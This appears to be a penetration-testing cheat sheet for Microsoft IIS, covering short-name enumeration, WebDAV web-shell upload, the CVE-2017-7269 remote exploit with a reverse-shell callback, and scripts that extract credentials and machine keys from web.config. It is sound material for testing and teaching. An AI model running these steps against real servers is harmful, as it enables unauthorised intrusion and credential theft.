IIS (Internet Information Services)
What it is: Microsoft's web server, bundled with Windows Server. Serves classic ASP, ASP.NET (ASPX, ASHX, ASMX) and static content. Common on Windows-based targets and usually joined to the same Active Directory domain as the rest of the estate, so a shell on IIS is a domain foothold, not just a web bug.
Default ports: 80 (HTTP), 443 (HTTPS). 8080 and other ports only when an extra site binding was configured; check every open port, not just the defaults.
Vuln research:
Identify IIS version
Headers reveal version and OS — Determines attack surface
curl -sI http://$IP/ | grep -iE '^(server|x-powered-by|x-aspnet-version):'
nmap -sV -p 80,443 $IP
Example Output
Server: Microsoft-IIS/10.0
IIS 6.0 = Windows Server 2003 (end of life since 2015, see the WebDAV RCE below)
IIS 7.0 = Windows Server 2008
IIS 7.5 = Windows Server 2008 R2
IIS 8.0 = Windows Server 2012
IIS 8.5 = Windows Server 2012 R2
IIS 10.0 = Windows Server 2016/2019/2022 (and Windows 10/11 client installs)
# Caveat: the Server header can be stripped (IIS 10 requestFiltering removeServerHeader="true"), rewritten by a URL Rewrite outbound rule, or replaced by a reverse proxy in front. Corroborate with the style of the default 404 page and nmap -sV instead of trusting a single header.
IIS shortname enumeration
Tilde (~) vulnerability — Reveal the 8.3 short names of hidden files and directories (first 6 characters of the name, ~1, first 3 of the extension); expand them afterwards with a wordlist
# Use IIS-ShortName-Scanner (https://github.com/irsdl/IIS-ShortName-Scanner); arguments are showProgress threadCount URL:
java -jar iis_shortname_scanner.jar 2 20 http://$IP/
# Or manual: a wildcard that matches some short name gives 404, one that cannot match gives 400
curl -s -o /dev/null -w '%{http_code}\n' -X OPTIONS "http://$IP/*~1*/.aspx"            # 404 = vulnerable and at least one long name exists
curl -s -o /dev/null -w '%{http_code}\n' -X OPTIONS "http://$IP/QWERTYUIOP*~1*/.aspx"  # 400 = control, a 10-character prefix can never match
curl -s -o /dev/null -w '%{http_code}\n' -X OPTIONS "http://$IP/w*~1*/.aspx"           # 404 = a name starting with W exists (web.config is WEB~1.CON)
# OPTIONS works on most versions; GET, DEBUG and POST work on others, so try each. Files whose names already fit 8.3 (e.g. index.htm) have no short alias and stay invisible to this trick.
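The character-by-character walk that the scanner automates, as an added example written for this page (not code from IIS-ShortName-Scanner): it probes `/<glob>/.aspx` with OPTIONS, extends the name one character at a time while the wildcard still returns 404, then walks the extension the same way. The `fake_iis` stand-in and its simplified 8.3 generator are constructed here so the walk can be exercised offline; point `http_probe` at a real host to run it for real.

```python
"""IIS short-name (8.3, tilde) enumeration with only the standard library.

Added example for this page, not IIS-ShortName-Scanner's code. A glob that
matches some short name returns 404, one that matches nothing returns 400,
so the name is recovered one character at a time without guessing words.
"""
import fnmatch
import urllib.error
import urllib.request

# 8.3 short names are uppercase; these are the characters worth walking
CHARSET = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-"
# A 10-character prefix can never match: the name part before ~1 is at most 6 characters
NEVER_MATCHES = "QWERTYUIOP"


def http_probe(base_url, method="OPTIONS", timeout=5):
    """Build probe(glob) -> HTTP status for a live target (GET/DEBUG work on some versions)."""
    base_url = base_url.rstrip("/")

    def probe(glob):
        req = urllib.request.Request(f"{base_url}/{glob}/.aspx", method=method)
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                return resp.status
        except urllib.error.HTTPError as err:
            return err.code  # 404 and 400 are the signal here, not failures

    return probe


def is_vulnerable(probe):
    """Vulnerable iff 'anything~1' gives 404 and an impossible prefix gives 400."""
    return probe("*~1*") == 404 and probe(f"{NEVER_MATCHES}*~1*") == 400


def enumerate_shortnames(probe, max_name=6, max_ext=3):
    """Depth-first walk of the name part, then of the extension.
    Only ~1 is walked; a second file sharing the first six characters would be ~2."""
    found = []
    stack = [""]
    while stack:
        prefix = stack.pop()
        if prefix and probe(f"{prefix}~1*") == 404:  # name part is exactly prefix
            found.extend(_extensions(probe, prefix, max_ext))
        if len(prefix) < max_name:
            for ch in CHARSET:
                if probe(f"{prefix}{ch}*~1*") == 404:
                    stack.append(prefix + ch)
    return sorted(found)


def _extensions(probe, name, max_ext):
    out = []
    if probe(f"{name}~1") == 404:  # exact match with no extension: a directory
        out.append(f"{name}~1")
    stack = [""]
    while stack:
        ext = stack.pop()
        if ext and probe(f"{name}~1.{ext}") == 404:  # exact extension
            out.append(f"{name}~1.{ext}")
        if len(ext) < max_ext:
            for ch in CHARSET:
                if probe(f"{name}~1.{ext}{ch}*") == 404:
                    stack.append(ext + ch)
    return out


def short_name(long_name):
    """Simplified Windows 8.3 generation for the offline stand-in: names that
    already fit 8.3 get no alias, which is why they never show up in the walk."""
    base, dot, ext = long_name.rpartition(".")
    if not dot:
        base, ext = long_name, ""
    ok = lambda c: c.isalnum() or c in "_-"
    if len(base) <= 8 and len(ext) <= 3 and all(map(ok, base + ext)):
        return None
    base = "".join(filter(ok, base)).upper()[:6]
    ext = "".join(filter(ok, ext)).upper()[:3]
    return f"{base}~1.{ext}" if ext else f"{base}~1"


def fake_iis(long_names):
    """Constructed stand-in for a vulnerable IIS: answers 404/400 like the real bug."""
    shorts = [s for s in map(short_name, long_names) if s]

    def probe(glob):
        return 404 if any(fnmatch.fnmatchcase(s, glob.upper()) for s in shorts) else 400

    return probe


if __name__ == "__main__":
    import sys
    target = http_probe(sys.argv[1]) if len(sys.argv) > 1 else fake_iis(
        ["web.config", "aspnet_client", "iisstart.htm", "backup_old.zip", "shell.aspx"])
    if is_vulnerable(target):
        for name in enumerate_shortnames(target):
            print(name)
    else:
        print("not vulnerable (or every name already fits 8.3)")
```

Against the constructed file list the walk returns ASPNET~1 (a directory), BACKUP~1.ZIP, SHELL~1.ASP and WEB~1.CON, while iisstart.htm never appears because it already fits 8.3. Each discovered short name is a wordlist seed: BACKUP~1.ZIP means a name beginning with "backup" and ending in ".zip", which gobuster or a small custom list finishes off.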
IIS WebDAV exploitation
If WebDAV is enabled (OPTIONS lists PROPFIND/PUT/MOVE, or the response carries a DAV: header) — Upload files directly
curl -sI -X OPTIONS http://$IP/ | grep -iE '^(allow|dav|public):'
davtest -url http://$IP/                  # PUTs a test file of every extension and reports which ones execute
davtest -url http://$IP/ -auth user:pass  # when the directory needs credentials
cadaver http://$IP/                       # interactive client: put, mv, ls
# Upload ASPX web shell (curl -T sends a PUT):
curl -T shell.aspx http://$IP/shell.aspx
# If .aspx is blocked by request filtering, upload as .txt then MOVE (COPY works too); Destination must be a full URL:
curl -T shell.aspx http://$IP/shell.txt
curl -X MOVE -H "Destination: http://$IP/shell.aspx" http://$IP/shell.txt
# Confirm it executes instead of being served back as text:
curl -s http://$IP/shell.aspx
IIS 6.0 RCE (CVE-2017-7269)
Buffer overflow in ScStoragePathFromUrl, triggered by a PROPFIND request with an overlong If: header — Windows Server 2003 R2 with IIS 6.0, WebDAV must be enabled (check with the OPTIONS request above)
python2 iis6_exploit.py $IP 80 $LHOST 4444   # public PoC; argument order differs between scripts, read the usage first
# Or Metasploit:
use exploit/windows/iis/iis_webdav_scstoragepathfromurl
set RHOSTS $IP
set LHOST $LHOST
run
web.config for sensitive info
IIS/ASP.NET configuration file — May contain database connection strings (often with sa), a static <machineKey> (validationKey/decryptionKey, which lets you forge ViewState for that application), appSettings secrets, and debug/customErrors settings that turn on verbose errors
# IIS normally refuses to serve .config files (request filtering maps them to a forbidden handler and returns 404), so a direct request is a quick sanity check, not the way in; read it through directory traversal, LFI, a leftover backup copy, or a source-disclosure bug:
curl -s http://$IP/web.config                                  # expect 404 on a sane config
curl -s http://$IP/web.config.bak                              # editor and backup copies are not filtered
curl -s "http://$IP/download.aspx?file=..\\..\\web.config"     # hypothetical traversal parameter, substitute the real one
# Common locations:
C:\inetpub\wwwroot\web.config
C:\Windows\System32\inetsrv\config\applicationHost.config              # server-wide config, includes virtual directory and app pool settings
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config      # root web.config and machine.config, inherited by every site
Example Output
<connectionStrings>
<add connectionString="Server=localhost;Database=mydb;User Id=sa;Password=SuperSecret123;" />
</connectionStrings>
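Triage of a recovered web.config, as an added example written for this page (not tooling from the original): it pulls out connection strings and splits them into server/user/password, flags appSettings whose key looks like a credential (the key regex is a heuristic, an assumption of this example), records a static machineKey, and notes sections encrypted with aspnet_regiis, which you cannot decrypt offline but can on the host itself. The sample config is constructed here, not taken from any real host.

```python
"""Triage an IIS/ASP.NET web.config for secrets. Added example for this page,
standard library only."""
import re
import xml.etree.ElementTree as ET

# Heuristic (assumption of this example): appSettings keys that usually hold credentials
SECRET_KEY_RE = re.compile(r"pass|pwd|secret|key|token|credential", re.I)

# Constructed sample, not taken from any real host
SAMPLE_WEB_CONFIG = """<?xml version="1.0"?>
<configuration>
  <connectionStrings>
    <add name="MainDb" providerName="System.Data.SqlClient"
         connectionString="Server=localhost;Database=mydb;User Id=sa;Password=SuperSecret123;" />
  </connectionStrings>
  <appSettings>
    <add key="ApiBaseUrl" value="https://api.internal/" />
    <add key="SmtpPassword" value="mailpass!" />
  </appSettings>
  <system.web>
    <machineKey validationKey="A1B2C3" decryptionKey="D4E5F6" validation="SHA1" decryption="AES" />
    <compilation debug="true" />
    <customErrors mode="Off" />
  </system.web>
</configuration>
"""


def parse_connection_string(cs):
    """'Server=x;User Id=sa;Password=p;' -> {'server': 'x', 'user id': 'sa', 'password': 'p'}"""
    pairs = (part.split("=", 1) for part in cs.split(";") if "=" in part)
    return {k.strip().lower(): v.strip() for k, v in pairs}


def parse_web_config(xml_text):
    root = ET.fromstring(xml_text)
    findings = {
        "connectionStrings": [],
        "appSettings": [],
        "machineKey": {},
        "encryptedSections": [],
        "debug": False,
        "customErrorsOff": False,
    }
    # Sections protected with aspnet_regiis -pe carry this attribute. The ciphertext is useless
    # offline (the RSA/DPAPI key lives on the box) but decrypts on the host with aspnet_regiis -pdf
    for el in root.iter():
        if el.get("configProtectionProvider"):
            findings["encryptedSections"].append((el.tag, el.get("configProtectionProvider")))
    for add in root.iterfind("./connectionStrings/add"):
        raw = add.get("connectionString", "")
        findings["connectionStrings"].append(
            {"name": add.get("name"), "raw": raw, "parsed": parse_connection_string(raw)})
    for add in root.iterfind("./appSettings/add"):
        if SECRET_KEY_RE.search(add.get("key", "")):
            findings["appSettings"].append((add.get("key"), add.get("value")))
    mk = root.find("./system.web/machineKey")
    if mk is not None:  # static keys let anyone holding them sign and encrypt ViewState for this app
        findings["machineKey"] = dict(mk.attrib)
    comp = root.find("./system.web/compilation")
    findings["debug"] = comp is not None and comp.get("debug", "").lower() == "true"
    ce = root.find("./system.web/customErrors")
    findings["customErrorsOff"] = ce is not None and ce.get("mode", "").lower() == "off"
    return findings


def database_credentials(findings):
    """Just the (server, user, password) triples, the part you replay against MSSQL."""
    creds = []
    for cs in findings["connectionStrings"]:
        p = cs["parsed"]
        user = p.get("user id") or p.get("uid") or p.get("user")
        pw = p.get("password") or p.get("pwd")
        if user and pw:
            creds.append((p.get("server") or p.get("data source"), user, pw))
    return creds


if __name__ == "__main__":
    import json
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_WEB_CONFIG
    print(json.dumps(parse_web_config(text), indent=2))
```

Run it with a recovered file as the first argument; with no argument it parses the constructed sample. A non-empty encryptedSections entry is the cue to come back once you have execution on the host, and a populated machineKey is the cue to look at ViewState.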
Default IIS files and directories
Check for information disclosure
# Files:
/iisstart.htm # Default page (a stock install with nothing deployed at the site root)
/aspnet_client/ # ASP.NET client files
/web.config # Configuration (normally refused by request filtering; try .bak/.old copies)
/_vti_bin/ # FrontPage extensions
/_vti_inf.html # FrontPage version info
/Trace.axd # ASP.NET request tracing; if enabled it dumps recent requests, headers and server variables
/elmah.axd # ELMAH error log viewer; if exposed it leaks stack traces and request details
# Brute force (IIS paths are case-insensitive, so a lowercase wordlist is enough; add names recovered by the tilde trick):
gobuster dir -u http://$IP -w /usr/share/wordlists/dirb/common.txt -x asp,aspx,ashx,asmx,config,txt,bak,old